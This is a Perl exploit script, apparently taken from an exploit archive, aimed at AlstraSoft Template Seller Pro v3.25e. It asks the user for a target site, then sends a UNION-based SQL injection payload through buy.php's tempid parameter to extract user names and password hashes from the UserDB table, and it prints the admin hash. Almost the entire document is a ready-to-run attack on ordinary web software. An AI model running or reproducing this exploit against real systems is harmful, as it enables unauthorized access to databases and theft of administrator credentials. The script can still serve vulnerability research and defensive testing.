44 lines
No EOL
1.7 KiB
Perl
Executable file
44 lines
No EOL
1.7 KiB
Perl
Executable file
#!/usr/bin/perl -w
|
|
# # # # #
|
|
# Exploit Title: AlstraSoft Template Seller Pro v3.25e Script (buy.php)- Remote SQL Injection Vulnerability
|
|
# Google Dork: N/A
|
|
# Date: 04.02.2017
|
|
# Vendor Homepage: http://www.alstrasoft.com/
|
|
# Software Buy: http://www.alstrasoft.com/template.htm
|
|
# Demo: http://blizsoft.com/templates/
|
|
# Version: 3.25e
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
sub clear{
|
|
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
|
|
clear();
|
|
print "|----------------------------------------------------|\n";
|
|
print "| Template Seller Pro v3.25e Remote SQL Injector |\n";
|
|
print "| Author: Ihsan Sencan |\n";
|
|
print "| Author Web: http://ihsan.net |\n";
|
|
print "| Mail : ihsan[beygir]ihsan[nokta]net |\n";
|
|
print "| |\n";
|
|
print "| |\n";
|
|
print "|----------------------------------------------------|\n";
|
|
use LWP::UserAgent;
|
|
print "\nInsert Target:[http://wwww.site.com/path/]: ";
|
|
chomp(my $target=<STDIN>);
|
|
print "\n[!] Exploiting Progress...\n";
|
|
print "\n";
|
|
$elicha="group_concat(user_name,char(58),user_password)";
|
|
$table="UserDB";
|
|
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
|
|
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
|
|
$host = $target . "buy.php?tempid=-1+union+select+1,2,3,".$elicha.",5,6,7,8+from/**/".$table."+--+";
|
|
$res = $b->request(HTTP::Request->new(GET=>$host));
|
|
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
|
|
print "\n[+] Admin Hash : $1\n";
|
|
print "[+] Success !!\n";
|
|
print "\n";
|
|
}
|
|
else{print "\n[-]Not found.\n";
|
|
} |